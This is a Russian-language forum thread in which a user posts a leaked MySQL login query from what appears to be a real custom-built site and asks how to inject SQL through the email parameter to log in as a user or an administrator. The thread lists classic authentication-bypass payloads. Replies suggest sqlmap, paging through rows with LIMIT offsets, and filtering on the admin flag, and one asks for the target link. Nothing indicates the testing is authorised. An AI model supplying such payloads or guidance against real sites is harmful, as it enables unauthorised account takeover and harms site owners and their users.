 |
21.12.2021, 08:06
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
С нами:
5039606
Репутация:
1
|
|
{"success":false,"message":"SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '098f6bcd4621d373cade4e832627b4f6', password_salt)) AND isbanned = 0 AND isdele' at line 1 (SQL: select `id`, `current_sign_in_at`, `current_sign_in_ip`, `isadmin_level1`, `isadmin`, `is_superadmin` from `users` where (email = 'RoXQ2bT562lTHlQ4Xm3FJg==' OR username = 'test'') AND BINARY encrypted_password = SHA1(CONCAT('098f6bcd4621d373cade4e832627b4f6', password_salt)) AND isbanned = 0 AND isdeleted = 0 limit 1)","alert":{"title":null,"description":null,"type ":"error"}}
В пост запросе (авторизация юзера) в параметере email есть sql!Как составить запрос чтоб авторизоваться под юзером?
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
Не катит
|
|
|
22.12.2021, 12:21
|
|
Участник форума
Регистрация: 30.12.2016
Сообщений: 218
С нами:
4931606
Репутация:
138
|
|
Надеюсь это не взлом, а тестирование, тогда
|
|
|
|
11.04.2022, 18:38
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
С нами:
5039606
Репутация:
1
|
|
Сообщение от dooble
↑
Надеюсь это не взлом, а тестирование, тогда
Здесь я так понимаю ID админа = 1
А как составить запрос если не знаешь id админа?
|
|
|
|
11.04.2022, 19:00
|
|
Познающий
Регистрация: 10.10.2006
Сообщений: 65
С нами:
10307292
Репутация:
20
|
|
Сообщение от brown
↑
Здесь я так понимаю ID админа = 1
SQLmap не помогает ?
|
|
|
|
11.04.2022, 19:10
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
С нами:
5039606
Репутация:
1
|
|
двиг самопис,хэш не понятный
|
|
|
|
12.04.2022, 11:57
|
|
Участник форума
Регистрация: 30.12.2016
Сообщений: 218
С нами:
4931606
Репутация:
138
|
|
Сообщение от brown
↑
Здесь я так понимаю ID админа = 1
А как составить запрос если не знаешь id админа?
Нет, здесь условие составлено таким образом, что все записи попадут в выборку, а перебирать строки можно через limit 4,1 (например, пятая строка выборки).
Или дополнительно фильтровать по полю - признаку админа, если разобрался со структурой нужных таблиц.
|
|
|
|
15.04.2022, 18:16
|
|
Участник форума
Регистрация: 04.05.2017
Сообщений: 244
С нами:
4751606
Репутация:
6
|
|
Сообщение от brown
↑
Здесь я так понимаю ID админа = 1
А как составить запрос если не знаешь id админа?
ссылочку скинь посмотреть
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
